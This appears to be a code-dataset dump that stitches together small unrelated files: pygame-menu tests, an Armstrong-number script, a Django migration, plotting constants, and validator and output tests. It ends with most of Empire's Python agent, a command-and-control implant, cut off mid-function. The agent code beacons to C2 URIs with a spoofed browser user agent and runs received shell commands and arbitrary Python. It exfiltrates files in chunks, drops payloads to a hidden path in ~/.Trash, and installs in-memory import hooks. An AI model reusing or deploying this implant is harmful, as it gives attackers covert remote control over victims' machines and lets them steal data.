self.assertEqual(sel.get_height(), margin_y)
self.assertEqual(sel.get_width(), margin_x)
rect = w.get_rect()
inflate_rect = sel.inflate(rect)
self.assertEqual(-inflate_rect.x + rect.x, sel.get_width() / 2)
self.assertEqual(-inflate_rect.y + rect.y, sel.get_height() / 2)
sel.margin_xy(10, 20)
self.assertEqual(sel.margin_left, 10)
self.assertEqual(sel.margin_right, 10)
self.assertEqual(sel.margin_top, 20)
self.assertEqual(sel.margin_bottom, 20)
sel._border_width = 0
sel.draw(surface, w)
def test_none(self) -> None:
w = Button('epic')
w.set_selection_effect(NoneSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertFalse(w.get_selection_effect().widget_apply_font_color)
last_selection = w.get_selection_effect()
w.set_selection_effect()
self.assertIsInstance(w.get_selection_effect(), NoneSelection)
self.assertNotEqual(w.get_selection_effect(), last_selection)
def test_simple(self) -> None:
w = Button('epic')
w.set_selection_effect(SimpleSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertTrue(w.get_selection_effect().widget_apply_font_color)
| true
| true
|
f707a49d416f27b0ecff72b18c4680093e2c3895
| 206
|
py
|
Python
|
Armstrong.py
|
arelemegha/python-programs
|
c9af116c0db45dcd13d97e80a32733df372fe2d4
|
[
"CC0-1.0"
] | null | null | null |
Armstrong.py
|
arelemegha/python-programs
|
c9af116c0db45dcd13d97e80a32733df372fe2d4
|
[
"CC0-1.0"
] | null | null | null |
Armstrong.py
|
arelemegha/python-programs
|
c9af116c0db45dcd13d97e80a32733df372fe2d4
|
[
"CC0-1.0"
] | null | null | null |
n = int(input("Enter a number : "))
s = 0
num = n
while(n>0):
r = n % 10
s = s + r* r* r
n = n//10
if(s==num):
print("The number is Armstrong")
else:
print("The number is not Armstrong")
| 17.166667
| 40
| 0.533981
|
n = int(input("Enter a number : "))
s = 0
num = n
while(n>0):
r = n % 10
s = s + r* r* r
n = n//10
if(s==num):
print("The number is Armstrong")
else:
print("The number is not Armstrong")
| true
| true
|
f707a737e553def25058f11a5331e623cb147c67
| 406
|
py
|
Python
|
websites/migrations/0017_rename_filepath.py
|
mitodl/ocw-studio
|
949f96ec0647064f8d495ebdd22d66eea7d024a5
|
[
"BSD-3-Clause"
] | 2
|
2020-08-07T15:55:41.000Z
|
2021-08-16T18:28:09.000Z
|
websites/migrations/0017_rename_filepath.py
|
mitodl/ocw-studio
|
949f96ec0647064f8d495ebdd22d66eea7d024a5
|
[
"BSD-3-Clause"
] | 924
|
2020-08-10T17:54:19.000Z
|
2022-03-31T21:15:17.000Z
|
websites/migrations/0017_rename_filepath.py
|
mitodl/ocw-studio
|
949f96ec0647064f8d495ebdd22d66eea7d024a5
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.1.6 on 2021-04-14 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("websites", "0016_remove_site_content_type_constraint"),
]
operations = [
migrations.RenameField(
model_name="websitecontent",
old_name="hugo_filepath",
new_name="content_filepath",
),
]
| 21.368421
| 65
| 0.628079
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("websites", "0016_remove_site_content_type_constraint"),
]
operations = [
migrations.RenameField(
model_name="websitecontent",
old_name="hugo_filepath",
new_name="content_filepath",
),
]
| true
| true
|
f707a7429d8663d95daeaa86cc6106e5370fc538
| 334
|
py
|
Python
|
toolkit/visualization/draw_utils.py
|
airium/pysot
|
c34158ba7b4a9b73938320e0019b61e6460537fc
|
[
"Apache-2.0"
] | null | null | null |
toolkit/visualization/draw_utils.py
|
airium/pysot
|
c34158ba7b4a9b73938320e0019b61e6460537fc
|
[
"Apache-2.0"
] | null | null | null |
toolkit/visualization/draw_utils.py
|
airium/pysot
|
c34158ba7b4a9b73938320e0019b61e6460537fc
|
[
"Apache-2.0"
] | null | null | null |
COLOR = ((1, 0, 0), (0, 1, 0), (1, 0, 1), (1, 1, 0), (0, 162 / 255, 232 / 255), (0.5, 0.5, 0.5), (0, 0, 1), (0, 1, 1),
(136 / 255, 0, 21 / 255), (255 / 255, 127 / 255, 39 / 255), (0, 0, 0))
LINE_STYLE = ['-', '--', ':', '-', '--', ':', '-', '--', ':', '-']
MARKER_STYLE = ['o', 'v', '<', '*', 'D', 'x', '.', 'x', '<', '.']
| 47.714286
| 118
| 0.302395
|
COLOR = ((1, 0, 0), (0, 1, 0), (1, 0, 1), (1, 1, 0), (0, 162 / 255, 232 / 255), (0.5, 0.5, 0.5), (0, 0, 1), (0, 1, 1),
(136 / 255, 0, 21 / 255), (255 / 255, 127 / 255, 39 / 255), (0, 0, 0))
LINE_STYLE = ['-', '--', ':', '-', '--', ':', '-', '--', ':', '-']
MARKER_STYLE = ['o', 'v', '<', '*', 'D', 'x', '.', 'x', '<', '.']
| true
| true
|
f707a796c39cbd67c8af787b6b9a266f5e4f040b
| 2,578
|
py
|
Python
|
tests/test_validator_create.py
|
VariantEffect/fqfa
|
f99e96009a05a24ca6aabbf9e04d3cf87fe00cb4
|
[
"BSD-3-Clause"
] | 2
|
2019-12-24T06:53:57.000Z
|
2020-01-15T21:06:24.000Z
|
tests/test_validator_create.py
|
VariantEffect/fqfa
|
f99e96009a05a24ca6aabbf9e04d3cf87fe00cb4
|
[
"BSD-3-Clause"
] | 3
|
2020-01-23T03:34:47.000Z
|
2020-02-20T10:22:23.000Z
|
tests/test_validator_create.py
|
VariantEffect/fqfa
|
f99e96009a05a24ca6aabbf9e04d3cf87fe00cb4
|
[
"BSD-3-Clause"
] | 2
|
2020-02-11T23:39:11.000Z
|
2020-03-28T22:00:24.000Z
|
import unittest
from fqfa.validator.create import create_validator
class TestCreateValidator(unittest.TestCase):
def test_create_from_string(self) -> None:
# case sensitive
validator = create_validator("ACGT")
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
# test invalid strings
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# case insensitive
validator = create_validator("ACGT", case_sensitive=False)
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
# test invalid strings
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
def test_create_from_list(self) -> None:
# case sensitive
validator = create_validator(list("ACGT"))
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
# test invalid strings
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# case insensitive
validator = create_validator(list("ACGT"), case_sensitive=False)
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
# test invalid strings
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# invalid list arguments
self.assertRaises(ValueError, create_validator, ["A", "C", "GT"])
self.assertRaises(
ValueError, create_validator, ["A", "C", "GT"], case_sensitive=False
)
self.assertRaises(ValueError, create_validator, ["A", "C", ""])
self.assertRaises(
ValueError, create_validator, ["A", "C", ""], case_sensitive=False
)
if __name__ == "__main__":
unittest.main()
| 33.051282
| 80
| 0.640419
|
import unittest
from fqfa.validator.create import create_validator
class TestCreateValidator(unittest.TestCase):
def test_create_from_string(self) -> None:
validator = create_validator("ACGT")
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
validator = create_validator("ACGT", case_sensitive=False)
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
def test_create_from_list(self) -> None:
validator = create_validator(list("ACGT"))
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
validator = create_validator(list("ACGT"), case_sensitive=False)
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
self.assertRaises(ValueError, create_validator, ["A", "C", "GT"])
self.assertRaises(
ValueError, create_validator, ["A", "C", "GT"], case_sensitive=False
)
self.assertRaises(ValueError, create_validator, ["A", "C", ""])
self.assertRaises(
ValueError, create_validator, ["A", "C", ""], case_sensitive=False
)
if __name__ == "__main__":
unittest.main()
| true
| true
|
f707a803b8253bc035a491d4c9d83e52765edaa4
| 1,204
|
py
|
Python
|
rpip/tests/test_output.py
|
danielfrg/remote-pip
|
1635388edb9215c811ab7632769a2b56f464c55b
|
[
"Apache-2.0"
] | 5
|
2015-10-28T06:30:55.000Z
|
2022-03-09T07:05:26.000Z
|
rpip/tests/test_output.py
|
danielfrg/remote-pip
|
1635388edb9215c811ab7632769a2b56f464c55b
|
[
"Apache-2.0"
] | null | null | null |
rpip/tests/test_output.py
|
danielfrg/remote-pip
|
1635388edb9215c811ab7632769a2b56f464c55b
|
[
"Apache-2.0"
] | 1
|
2019-11-02T16:39:32.000Z
|
2019-11-02T16:39:32.000Z
|
from rpip.output import Output
exit0 = {'exit_code': 0, 'stdout': 'yes', 'stderr': ''}
exit1 = {'exit_code': 1, 'stdout': '', 'stderr': 'ERROR'}
o0 = {'host1': exit0, 'host2': exit0, 'host3': exit0}
o1 = {'host1': exit0, 'host2': exit1, 'host3': exit0}
o2 = {'host1': exit0, 'host2': exit1, 'host3': exit1}
def test_groupby():
o = Output(o0)
groups = o.groupby()
assert len(groups) == 1
nodes, output = groups[0]
assert len(nodes) == 3
assert nodes == ['host3', 'host2', 'host1']
assert output == exit0
def test_groupby2():
o = Output(o1)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host1']
assert output == exit0
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host2']
assert output == exit1
def test_groupby3():
o = Output(o2)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host2']
assert output == exit1
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host1']
assert output == exit0
| 23.153846
| 57
| 0.579734
|
from rpip.output import Output
exit0 = {'exit_code': 0, 'stdout': 'yes', 'stderr': ''}
exit1 = {'exit_code': 1, 'stdout': '', 'stderr': 'ERROR'}
o0 = {'host1': exit0, 'host2': exit0, 'host3': exit0}
o1 = {'host1': exit0, 'host2': exit1, 'host3': exit0}
o2 = {'host1': exit0, 'host2': exit1, 'host3': exit1}
def test_groupby():
o = Output(o0)
groups = o.groupby()
assert len(groups) == 1
nodes, output = groups[0]
assert len(nodes) == 3
assert nodes == ['host3', 'host2', 'host1']
assert output == exit0
def test_groupby2():
o = Output(o1)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host1']
assert output == exit0
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host2']
assert output == exit1
def test_groupby3():
o = Output(o2)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host2']
assert output == exit1
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host1']
assert output == exit0
| true
| true
|
f707a8765e9180ae397c0300f2561d2885361426
| 37,219
|
py
|
Python
|
empire/server/data/agent/agent.py
|
joewildiml/Empire
|
d60f36d10c674b51dd60f63efe3b1ae007d5933e
|
[
"BSD-3-Clause"
] | 1
|
2022-02-03T20:01:56.000Z
|
2022-02-03T20:01:56.000Z
|
empire/server/data/agent/agent.py
|
joewildiml/Empire
|
d60f36d10c674b51dd60f63efe3b1ae007d5933e
|
[
"BSD-3-Clause"
] | null | null | null |
empire/server/data/agent/agent.py
|
joewildiml/Empire
|
d60f36d10c674b51dd60f63efe3b1ae007d5933e
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import types
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
proxy_list = []
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
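# e.g. a headersRaw entry "Accept:text/html" becomes headers['Accept'] = 'text/html'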
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
if packets is None:
return
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if (isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8', 'ignore'))
if len(packetData) % 4:
            packetData += b'=' * (4 - len(packetData) % 4)
length = struct.pack('=L', len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
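# Illustrative example (not executed here): build_response_packet(40, "pwd", 7)
# returns struct.pack('=HHHHL', 40, 1, 1, 7, 4) followed by b'cHdk', i.e. the
# 12-byte header plus base64("pwd") as the task data.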
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
Returns a tuple with (responseName, length, data, remainingData)
Returns a tuple with (responseName, totalPackets, packetNum, resultID, length, data, remainingData)
"""
try:
packetType = struct.unpack('=H', packet[0 + offset:2 + offset])[0]
totalPacket = struct.unpack('=H', packet[2 + offset:4 + offset])[0]
packetNum = struct.unpack('=H', packet[4 + offset:6 + offset])[0]
resultID = struct.unpack('=H', packet[6 + offset:8 + offset])[0]
length = struct.unpack('=L', packet[8 + offset:12 + offset])[0]
packetData = packet[12 + offset:12 + offset + length].decode('UTF-8')
remainingData = packet[12 + offset + length:].decode('UTF-8')
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:", e)
return (None, None, None, None, None, None, None)
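# Round-trip sanity check (illustrative):
#   pkt = build_response_packet(40, "pwd", resultID=7)
#   parse_task_packet(pkt)  ->  (40, 1, 1, 7, 4, 'cHdk', '')
# note the data field comes back still base64-encoded.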
def process_tasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
    global missedCheckins
    try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data).encode('UTF-8')
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking,
offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = b""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:", e)
pass
def process_packet(packetType, data, resultID):
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 34:
proxy_list = json.loads(data)
update_proxychain(proxy_list)
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData, resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData, resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
        if not os.path.exists(objPath):
            send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
            return
        if not os.path.isdir(objPath):
            fileList.append(objPath)
        else:
            # recursive dir listing
            for folder, subs, files in os.walk(objPath):
                for filename in files:
                    filePath = os.path.join(folder, filename)
                    # don't care about symlinks
                    if os.path.exists(filePath) and not os.path.islink(filePath):
                        fileList.append(filePath)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" % (partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
with open(filePath, 'ab') as f:
f.write(raw)
send_message(build_response_packet(42, "[*] Upload of %s successful" % (filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" % (filePath, str(e)), resultID))
elif packetType == 43:
# directory list
cmdargs = data
path = '/' # default to root
if cmdargs is not None and cmdargs != '' and cmdargs != '/': # strip trailing slash for uniformity
path = cmdargs.rstrip('/')
if path[0] != '/': # always scan relative to root for uniformity
path = '/{0}'.format(path)
        if not os.path.isdir(path):
            send_message(build_response_packet(43, 'Directory {} not found.'.format(path), resultID))
            return
items = []
with os.scandir(path) as it:
for entry in it:
items.append({'path': entry.path, 'name': entry.name, 'is_file': entry.is_file()})
result_data = json.dumps({
'directory_name': path if len(path) == 1 else path.split('/')[-1],
'directory_path': path,
'items': items
})
send_message(build_response_packet(43, result_data, resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" % (x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" % (data), resultID)
elif packetType == 100:
        # dynamic code execution, wait for output, don't save output
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue().encode('latin-1')
c = compress()
start_crc32 = c.crc32_data(results)
comp_data = c.comp_data(results)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
send_message(
build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart,
resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = buffer.getvalue()
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" % (implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" % (implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "[*] Module path was properly removed: %s" % (implantPath)
except Exception as e:
print("error removing module filed: %s" % (e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0,
"error executing specified Python data: %s \nError removing module file, please verify path: %s" % (
e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" % (e), resultID))
elif packetType == 110:
start_job(data, resultID)
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
# base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 122:
# base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
            if not dec_data['crc32_check']:
                send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
                return
        except Exception as e:
            send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
            return
        zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
# view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----" + key + "----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----" + repoName + "----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
# remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" % (taskingID), resultID))
def old_div(a, b):
"""
Equivalent to ``a / b`` on Python 2 without ``from __future__ import
division``.
"""
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
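# Quick sketch: old_div(7, 2) == 3 (floor division, both integral),
# while old_div(7.0, 2) == 3.5 (true division otherwise).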
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
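# Minimal flow sketch (the repo name 'mytools' is hypothetical):
#   moduleRepo['mytools'] = zipfile.ZipFile('mytools.zip', 'r')
#   install_hook('mytools')   # registers a CFinder on sys.meta_path
#   import helpers            # resolved from mytools.zip per _search_order
#   remove_hook('mytools')    # detaches the finder again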
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
# check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
        # Error out if we can't find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
            raise IOError('Path %r does not start with module name %r' % (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
